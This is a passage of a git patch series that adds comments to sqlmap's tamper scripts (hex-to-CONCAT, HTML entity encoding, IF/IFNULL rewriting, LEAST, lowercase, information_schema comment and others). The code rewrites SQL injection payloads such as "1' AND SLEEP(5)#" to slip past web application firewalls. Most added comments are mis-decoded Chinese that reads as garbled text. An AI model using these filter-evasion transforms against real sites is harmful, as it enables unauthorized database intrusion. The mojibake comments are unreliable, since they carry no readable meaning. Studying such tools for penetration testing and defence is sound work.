decodeHex -from lib.core.convert import getOrds -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.convert import decodeHex # 浠庢牳蹇冨簱瀵煎叆鍗佸叚杩涘埗瑙g爜鍑芥暟 +from lib.core.convert import getOrds # 浠庢牳蹇冨簱瀵煎叆鑾峰彇瀛楃ASCII鍊肩殑鍑芥暟 +from lib.core.enums import DBMS # 浠庢牳蹇冨簱瀵煎叆鏁版嵁搴撶鐞嗙郴缁熸灇涓 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -21,29 +22,37 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢姣忎釜MySQL鐨0x缂栫爜瀛楃涓叉浛鎹负鍏剁瓑鏁堢殑CONCAT(CHAR(),...)褰㈠紡銆 - Requirement: - * MySQL + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: - * MySQL 4, 5.0 and 5.5 + 瑕佹眰锛 + * 浠呴傜敤浜嶮ySQL鏁版嵁搴撱 - Notes: - * Useful in cases when web application does the upper casing + 娴嬭瘯鎯呭喌锛 + * MySQL 4, 5.0 鍜 5.5 - >>> tamper('SELECT 0xdeadbeef') - 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' + 娉ㄦ剰锛 + * 褰揥eb搴旂敤绋嬪簭鎵ц澶у啓杞崲鏃讹紝杩欎釜绡℃敼鏂规硶寰堟湁鐢ㄣ + + 绀轰緥锛 + >>> tamper('SELECT 0xdeadbeef') + 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 閬嶅巻payload涓墍鏈夊尮閰0x妯″紡鐨勫瓧绗︿覆 for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal): - if len(match.group(1)) > 2: + if len(match.group(1)) > 2: # 濡傛灉鍖归厤鐨勫崄鍏繘鍒跺瓧绗︿覆闀垮害澶т簬2 + # 灏嗗崄鍏繘鍒跺瓧绗︿覆瑙g爜涓篈SCII鍊硷紝骞舵瀯閫燙ONCAT(CHAR(),...)褰㈠紡鐨勫瓧绗︿覆 result = "CONCAT(%s)" % ','.join("CHAR(%d)" % _ for _ in getOrds(decodeHex(match.group(1)))) - else: + else: # 濡傛灉闀垮害涓嶈秴杩2锛岀洿鎺ユ瀯閫燙HAR()褰㈠紡鐨勫瓧绗︿覆 result = "CHAR(%d)" % ord(decodeHex(match.group(1))) + # 灏嗗師0x瀛楃涓叉浛鎹负鏂版瀯閫犵殑瀛楃涓 retVal = retVal.replace(match.group(0), result) return retVal diff --git a/src/sqlmap-master/tamper/hexentities.py b/src/sqlmap-master/tamper/hexentities.py index d36923e..2b2c849 100644 --- a/src/sqlmap-master/tamper/hexentities.py +++ b/src/sqlmap-master/tamper/hexentities.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY +# 璁剧疆浼樺厛绾т负浣 __priority__ = PRIORITY.LOW def dependencies(): @@ -14,20 +15,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode in hexadecimal (using code points) all characters (e.g. ' -> 1) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夊瓧绗﹁浆鎹负鍗佸叚杩涘埗褰㈠紡鐨凥TML瀹炰綋缂栫爜锛堜緥濡傦紝' -> 1锛夈 - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 閬嶅巻payload涓殑姣忎釜瀛楃锛屽苟灏嗘瘡涓瓧绗﹁浆鎹负鍏跺搴旂殑鍗佸叚杩涘埗HTML瀹炰綋褰㈠紡銆 + + 绀轰緥锛 + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' """ retVal = payload if payload: - retVal = "" - i = 0 + retVal = "" # 鍒濆鍖栬繑鍥炲煎瓧绗︿覆 + i = 0 # 鍒濆鍖栫储寮 while i < len(payload): + # 灏嗗綋鍓嶅瓧绗﹁浆鎹负鍏跺搴旂殑鍗佸叚杩涘埗HTML瀹炰綋褰㈠紡锛屽苟娣诲姞鍒拌繑鍥炲煎瓧绗︿覆 retVal += "&#x%s;" % format(ord(payload[i]), "x") - i += 1 + i += 1 # 绉诲姩绱㈠紩锛屽鐞嗕笅涓涓瓧绗 return retVal diff --git a/src/sqlmap-master/tamper/htmlencode.py b/src/sqlmap-master/tamper/htmlencode.py index 6cd5507..2a86822 100644 --- a/src/sqlmap-master/tamper/htmlencode.py +++ b/src/sqlmap-master/tamper/htmlencode.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负浣 __priority__ = PRIORITY.LOW def dependencies(): @@ -16,16 +17,26 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ') + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鎵鏈夐潪瀛楁瘝鏁板瓧瀛楃杞崲涓篐TML瀹炰綋缂栫爜锛堜娇鐢ㄤ唬鐮佺偣锛夈 - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 鍔熻兘锛 + - 閬嶅巻payload涓殑姣忎釜瀛楃锛屽苟灏嗛潪瀛楁瘝鏁板瓧瀛楃杞崲涓哄叾瀵瑰簲鐨凥TML瀹炰綋褰㈠紡銆 + + 绀轰緥锛 + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' """ - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 鏇挎崲宸茬粡缂栫爜鐨凥TML瀹炰綋 payload = re.sub(r"&#(\d+);", lambda match: chr(int(match.group(1))), payload) # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5203 + # 灏嗛潪瀛楁瘝鏁板瓧瀛楃杞崲涓篐TML瀹炰綋缂栫爜 payload = re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) return payload diff --git a/src/sqlmap-master/tamper/if2case.py b/src/sqlmap-master/tamper/if2case.py index 2e3a01f..b6381ea 100644 --- a/src/sqlmap-master/tamper/if2case.py +++ b/src/sqlmap-master/tamper/if2case.py @@ -5,10 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY -from lib.core.settings import REPLACEMENT_MARKER +from lib.core.compat import xrange # 瀵煎叆鍏煎搴撲腑鐨剎range鍑芥暟锛岀敤浜庡吋瀹筆ython 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +from lib.core.settings import REPLACEMENT_MARKER # 浠庢牳蹇冭缃鍏ユ浛鎹㈡爣璁 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -16,56 +17,60 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢'IF(A, B, C)'璇彞鏇挎崲涓哄叾绛夋晥鐨'CASE WHEN (A) THEN (B) ELSE (C) END'褰㈠紡銆 - Requirement: - * MySQL - * SQLite (possibly) - * SAP MaxDB (possibly) + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Tested against: - * MySQL 5.0 and 5.5 + 瑕佹眰锛 + * 閫傜敤浜嶮ySQL銆丼QLite锛堝彲鑳斤級鍜孲AP MaxDB锛堝彲鑳斤級鏁版嵁搴撱 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IF() functions + 娴嬭瘯鎯呭喌锛 + * MySQL 5.0 鍜 5.5 - >>> tamper('IF(1, 2, 3)') - 'CASE WHEN (1) THEN (2) ELSE (3) END' - >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') - 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护IF()鍑芥暟鐨勯潪甯稿急鐨勫畾鍒禬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 + + 绀轰緥锛 + >>> tamper('IF(1, 2, 3)') + 'CASE WHEN (1) THEN (2) ELSE (3) END' + >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') + 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' """ - if payload and payload.find("IF") > -1: - payload = payload.replace("()", REPLACEMENT_MARKER) - while payload.find("IF(") > -1: - index = payload.find("IF(") - depth = 1 - commas, end = [], None + if payload and payload.find("IF") > -1: # 濡傛灉payload涓嶄负绌轰笖鍖呭惈'IF' + payload = payload.replace("()", REPLACEMENT_MARKER) # 鏇挎崲绌烘嫭鍙蜂负鏇挎崲鏍囪 + while payload.find("IF(") > -1: # 閬嶅巻鎵鏈'IF'璇彞 + index = payload.find("IF(") # 鎵惧埌'IF'鐨勪綅缃 + depth = 1 # 鍒濆鍖栨嫭鍙锋繁搴 + commas, end = [], None # 鍒濆鍖栭楀彿浣嶇疆鍒楄〃鍜岀粨鏉熶綅缃 + # 閬嶅巻payload浠ユ壘鍒'IF'璇彞鐨勭粨鏉熶綅缃 for i in xrange(index + len("IF("), len(payload)): if depth == 1 and payload[i] == ',': - commas.append(i) + commas.append(i) # 璁板綍閫楀彿浣嶇疆 elif depth == 1 and payload[i] == ')': - end = i + end = i # 璁板綍缁撴潫浣嶇疆 break elif payload[i] == '(': - depth += 1 + depth += 1 # 澧炲姞鎷彿娣卞害 + elif payload[i] == ')': depth -= 1 - + # 濡傛灉鎵惧埌涓や釜閫楀彿涓旀湁缁撴潫浣嶇疆锛屽垯杩涜鏇挎崲 if len(commas) == 2 and end: - a = payload[index + len("IF("):commas[0]].strip("()") - b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") - c = payload[commas[1] + 1:end].lstrip().strip("()") - newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) - payload = payload[:index] + newVal + payload[end + 1:] + a = payload[index + len("IF("):commas[0]].strip("()") # 鎻愬彇鏉′欢A + b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") # 鎻愬彇缁撴灉B + c = payload[commas[1] + 1:end].lstrip().strip("()") # 鎻愬彇缁撴灉C + newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) # 鏋勯犳柊鐨凜ASE璇彞 + payload = payload[:index] + newVal + payload[end + 1:] # 鏇挎崲鍘烮F璇彞 else: - break + break # 濡傛灉涓嶇鍚堟潯浠讹紝鍒欑粓姝㈠惊鐜 - payload = payload.replace(REPLACEMENT_MARKER, "()") + payload = payload.replace(REPLACEMENT_MARKER, "()") # 鎭㈠鏇挎崲鏍囪涓虹┖鎷彿 return payload diff --git a/src/sqlmap-master/tamper/ifnull2casewhenisnull.py b/src/sqlmap-master/tamper/ifnull2casewhenisnull.py index f439d9d..dd8e6e1 100644 --- a/src/sqlmap-master/tamper/ifnull2casewhenisnull.py +++ b/src/sqlmap-master/tamper/ifnull2casewhenisnull.py @@ -5,9 +5,10 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY +from lib.core.compat import xrange # 瀵煎叆鍏煎搴撲腑鐨剎range鍑芥暟锛岀敤浜庡吋瀹筆ython 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -33,32 +34,35 @@ def tamper(payload, **kwargs): 'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END' """ - if payload and payload.find("IFNULL") > -1: - while payload.find("IFNULL(") > -1: - index = payload.find("IFNULL(") - depth = 1 - comma, end = None, None + if payload and payload.find("IFNULL") > -1: # 濡傛灉payload涓嶄负绌轰笖鍖呭惈'IFNULL' + while payload.find("IFNULL(") > -1: # 閬嶅巻鎵鏈'IFNULL'璇彞 + index = payload.find("IFNULL(") # 鎵惧埌'IFNULL'鐨勪綅缃 + depth = 1 # 鍒濆鍖栨嫭鍙锋繁搴 + comma, end = None, None # 鍒濆鍖栭楀彿浣嶇疆鍜岀粨鏉熶綅缃 + # 閬嶅巻payload浠ユ壘鍒'IFNULL'璇彞鐨勭粨鏉熶綅缃 for i in xrange(index + len("IFNULL("), len(payload)): if depth == 1 and payload[i] == ',': - comma = i + comma = i # 璁板綍閫楀彿浣嶇疆 elif depth == 1 and payload[i] == ')': - end = i + end = i # 璁板綍缁撴潫浣嶇疆 break elif payload[i] == '(': - depth += 1 + depth += 1 # 澧炲姞鎷彿娣卞害 + elif payload[i] == ')': - depth -= 1 + depth -= 1 # 鍑忓皯鎷彿娣卞害 + # 濡傛灉鎵惧埌閫楀彿鍜岀粨鏉熶綅缃紝鍒欒繘琛屾浛鎹 if comma and end: - _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end].lstrip() - newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _) - payload = payload[:index] + newVal + payload[end + 1:] + _ = payload[index + len("IFNULL("):comma] # 鎻愬彇鍙傛暟A + __ = payload[comma + 1:end].lstrip() # 鎻愬彇鍙傛暟B + newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _) # 鏋勯犳柊鐨凜ASE璇彞 + payload = payload[:index] + newVal + payload[end + 1:] # 鏇挎崲鍘烮FNULL璇彞 else: - break + break # 濡傛灉涓嶇鍚堟潯浠讹紝鍒欑粓姝㈠惊鐜 return payload From 951c2d6d9c254b025a8dd6380cf1422b03a0ece6 Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 30 Dec 2024 10:26:40 +0800 Subject: [PATCH 7/9] sck --- src/sqlmap-master/tamper/ifnull2ifisnull.py | 60 ++++++++++--------- .../tamper/informationschemacomment.py | 6 +- src/sqlmap-master/tamper/least.py | 33 +++++----- src/sqlmap-master/tamper/lowercase.py | 37 +++++++----- src/sqlmap-master/tamper/luanginx.py | 18 +++--- src/sqlmap-master/tamper/space2plus.py | 11 ++++ src/sqlmap-master/tamper/space2randomblank.py | 20 +++++++ .../tamper/substring2leftright.py | 10 ++++ src/sqlmap-master/tamper/symboliclogical.py | 5 ++ src/sqlmap-master/tamper/unionalltounion.py | 4 ++ src/sqlmap-master/tamper/unmagicquotes.py | 15 +++++ src/sqlmap-master/tamper/uppercase.py | 6 ++ src/sqlmap-master/tamper/varnish.py | 3 + src/sqlmap-master/tamper/versionedkeywords.py | 9 +++ .../tamper/versionedmorekeywords.py | 10 ++++ src/sqlmap-master/tamper/xforwardedfor.py | 10 ++++ 16 files changed, 190 insertions(+), 67 deletions(-) diff --git a/src/sqlmap-master/tamper/ifnull2ifisnull.py b/src/sqlmap-master/tamper/ifnull2ifisnull.py index d182b68..4f1b6ea 100644 --- a/src/sqlmap-master/tamper/ifnull2ifisnull.py +++ b/src/sqlmap-master/tamper/ifnull2ifisnull.py @@ -5,9 +5,9 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY - +from lib.core.compat import xrange # 瀵煎叆鍏煎搴撲腑鐨剎range鍑芥暟锛岀敤浜庡吋瀹筆ython 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏈楂 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -15,49 +15,53 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢'IFNULL(A, B)'璇彞鏇挎崲涓哄叾绛夋晥鐨'IF(ISNULL(A), B, A)'褰㈠紡銆 + + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 - Requirement: - * MySQL - * SQLite (possibly) - * SAP MaxDB (possibly) + 瑕佹眰锛 + * 閫傜敤浜嶮ySQL銆丼QLite锛堝彲鑳斤級鍜孲AP MaxDB锛堝彲鑳斤級鏁版嵁搴撱 - Tested against: - * MySQL 5.0 and 5.5 + 娴嬭瘯鎯呭喌锛 + * MySQL 5.0 鍜 5.5 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IFNULL() function + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护IFNULL()鍑芥暟鐨勯潪甯稿急鐨勫畾鍒禬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 - >>> tamper('IFNULL(1, 2)') - 'IF(ISNULL(1),2,1)' + 绀轰緥锛 + >>> tamper('IFNULL(1, 2)') + 'IF(ISNULL(1),2,1)' """ - if payload and payload.find("IFNULL") > -1: - while payload.find("IFNULL(") > -1: - index = payload.find("IFNULL(") - depth = 1 - comma, end = None, None + if payload and payload.find("IFNULL") > -1: # 濡傛灉payload涓嶄负绌轰笖鍖呭惈'IFNULL' + while payload.find("IFNULL(") > -1: # 閬嶅巻鎵鏈'IFNULL'璇彞 + index = payload.find("IFNULL(") # 鎵惧埌'IFNULL'鐨勪綅缃 + depth = 1 # 鍒濆鍖栨嫭鍙锋繁搴 + comma, end = None, None # 鍒濆鍖栭楀彿浣嶇疆鍜岀粨鏉熶綅缃 + # 閬嶅巻payload浠ユ壘鍒'IFNULL'璇彞鐨勭粨鏉熶綅缃 for i in xrange(index + len("IFNULL("), len(payload)): if depth == 1 and payload[i] == ',': - comma = i + comma = i # 璁板綍閫楀彿浣嶇疆 elif depth == 1 and payload[i] == ')': - end = i + end = i # 璁板綍缁撴潫浣嶇疆 break elif payload[i] == '(': - depth += 1 + depth += 1 # 澧炲姞鎷彿娣卞害 elif payload[i] == ')': - depth -= 1 + depth -= 1 # 鍑忓皯鎷彿娣卞害 + # 濡傛灉鎵惧埌閫楀彿鍜岀粨鏉熶綅缃紝鍒欒繘琛屾浛鎹 if comma and end: - _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end].lstrip() - newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) - payload = payload[:index] + newVal + payload[end + 1:] + _ = payload[index + len("IFNULL("):comma] # 鎻愬彇鍙傛暟A + __ = payload[comma + 1:end].lstrip() # 鎻愬彇鍙傛暟B + newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) # 鏋勯犳柊鐨処F璇彞 + payload = payload[:index] + newVal + payload[end + 1:] # 鏇挎崲鍘烮FNULL璇彞 else: break diff --git a/src/sqlmap-master/tamper/informationschemacomment.py b/src/sqlmap-master/tamper/informationschemacomment.py index 9ec46b5..585b0c2 100644 --- a/src/sqlmap-master/tamper/informationschemacomment.py +++ b/src/sqlmap-master/tamper/informationschemacomment.py @@ -9,6 +9,7 @@ import re from lib.core.enums import PRIORITY +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def tamper(payload, **kwargs): @@ -19,9 +20,10 @@ def tamper(payload, **kwargs): 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵"information_schema"骞舵坊鍔犲唴鑱旀敞閲 retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload) return retVal diff --git a/src/sqlmap-master/tamper/least.py b/src/sqlmap-master/tamper/least.py index 9c948b4..bbb37e5 100644 --- a/src/sqlmap-master/tamper/least.py +++ b/src/sqlmap-master/tamper/least.py @@ -5,7 +5,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧楋紝鐢ㄤ簬鍖归厤鍜屾浛鎹㈠瓧绗︿覆涓殑妯″紡 from lib.core.enums import PRIORITY @@ -16,30 +16,35 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'LEAST' counterpart + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢澶т簬鎿嶄綔绗︼紙'>')鏇挎崲涓'LEAST'鍑芥暟鐨勭瓑鏁堝舰寮忋 - Tested against: - * MySQL 4, 5.0 and 5.5 + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 娴嬭瘯鎯呭喌锛 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The LEAST clause is a widespread SQL command. Hence, this - tamper script should work against majority of databases + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺杩囨护澶т簬瀛楃锛'>')鐨勫急Web搴旂敤闃茬伀澧欏緢鏈夌敤銆 + * LEAST鍑芥暟鏄竴涓箍娉涗娇鐢ㄧ殑SQL鍛戒护銆傚洜姝わ紝杩欎釜tamper鑴氭湰搴旇閫傜敤浜庡ぇ澶氭暟鏁版嵁搴撱 - >>> tamper('1 AND A > B') - '1 AND LEAST(A,B+1)=B+1' + 绀轰緥锛 + >>> tamper('1 AND A > B') + '1 AND LEAST(A,B+1)=B+1' """ retVal = payload - if payload: + if payload: # 濡傛灉payload涓嶄负绌 + # 浣跨敤姝e垯琛ㄨ揪寮忔煡鎵'A > B'褰㈠紡鐨勮鍙 match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) - if match: + if match: # 濡傛灉鎵惧埌鍖归厤椤 + # 鏋勯燣EAST鍑芥暟褰㈠紡鐨勮鍙ワ紝骞舵浛鎹㈠師璇彞 _ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _) # 鏇挎崲鍘熻鍙ヤ负LEAST鍑芥暟褰㈠紡 return retVal diff --git a/src/sqlmap-master/tamper/lowercase.py b/src/sqlmap-master/tamper/lowercase.py index 230f7ef..adfab06 100644 --- a/src/sqlmap-master/tamper/lowercase.py +++ b/src/sqlmap-master/tamper/lowercase.py @@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re # 瀵煎叆姝e垯琛ㄨ揪寮忔ā鍧楋紝鐢ㄤ簬鍖归厤瀛楃涓蹭腑鐨勬ā寮 -from lib.core.data import kb -from lib.core.enums import PRIORITY +from lib.core.data import kb # 浠庢牳蹇冨簱瀵煎叆鐭ヨ瘑搴擄紝鍖呭惈SQL鍏抽敭瀛楃瓑淇℃伅 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +# 璁剧疆浼樺厛绾т负鏅 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -17,28 +18,34 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with lower case value (e.g. SELECT -> select) + 杩欎釜鍑芥暟鐢ㄤ簬绡℃敼锛坱amper锛夎緭鍏ョ殑payload锛屽皢鍏朵腑鐨勫叧閿瓧瀛楃杞崲涓哄皬鍐欏舰寮忥紙渚嬪锛'SELECT' -> 'select'锛夈 - Tested against: + 鍙傛暟锛 + payload锛氳绡℃敼鐨勫師濮媝ayload銆 + **kwargs锛氬叾浠栧彲閫夊弬鏁帮紙鍦ㄦ湰鍑芥暟涓湭浣跨敤锛夈 + + 娴嬭瘯鎯呭喌锛 * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + * MySQL 4, 5.0 鍜 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions + 娉ㄦ剰锛 + * 杩欎釜绡℃敼鏂规硶瀵逛簬缁曡繃閭d簺鍏锋湁鍐欏緱涓嶅ソ鐨勫厑璁告鍒欒〃杈惧紡鐨勯潪甯稿急鐨勫畾鍒禬eb搴旂敤闃茬伀澧欏緢鏈夌敤銆 - >>> tamper('INSERT') - 'insert' + 绀轰緥锛 + >>> tamper('INSERT') + 'insert' """ - retVal = payload + retVal = payload # 鍒濆鍖栬繑鍥炲间负杈撳叆鐨刾ayload - if payload: - for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): - word = match.group() + if payload: # 濡傛灉payload涓嶄负绌 + # 閬嶅巻payload涓墍鏈夊尮閰嶅崟璇嶈竟鐣岀殑瀛楁瘝鎴栦笅鍒掔嚎妯″紡鐨勫瓧绗︿覆 + for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): + word = match.group() # 鑾峰彇鍖归厤鐨勫崟璇 + # 濡傛灉鍖归厤鐨勫崟璇嶆槸SQL鍏抽敭瀛楋紝鍒欏皢鍏惰浆鎹负灏忓啓 if word.upper() in kb.keywords: retVal = retVal.replace(word, word.lower()) diff --git a/src/sqlmap-master/tamper/luanginx.py b/src/sqlmap-master/tamper/luanginx.py index f4bf825..ee3fe76 100644 --- a/src/sqlmap-master/tamper/luanginx.py +++ b/src/sqlmap-master/tamper/luanginx.py @@ -5,13 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import random -import string +import random # 瀵煎叆闅忔満鏁版ā鍧楋紝鐢ㄤ簬鐢熸垚闅忔満瀛楃涓 +import string # 瀵煎叆瀛楃涓叉ā鍧楋紝鐢ㄤ簬璁块棶瀛楃涓插父閲 -from lib.core.compat import xrange -from lib.core.enums import HINT -from lib.core.enums import PRIORITY -from lib.core.settings import DEFAULT_GET_POST_DELIMITER +from lib.core.compat import xrange # 瀵煎叆鍏煎搴撲腑鐨剎range鍑芥暟锛岀敤浜庡吋瀹筆ython 2鍜3鐨剅ange鍑芥暟 +from lib.core.enums import HINT # 浠庢牳蹇冨簱瀵煎叆鏋氫妇绫诲瀷 +from lib.core.enums import PRIORITY # 浠庢牳蹇冨簱瀵煎叆浼樺厛绾ф灇涓 +from lib.core.settings import DEFAULT_GET_POST_DELIMITER # 浠庢牳蹇冭缃鍏ラ粯璁ょ殑GET/POST鍙傛暟鍒嗛殧绗 __priority__ = PRIORITY.NORMAL @@ -29,8 +29,10 @@ def tamper(payload, **kwargs): 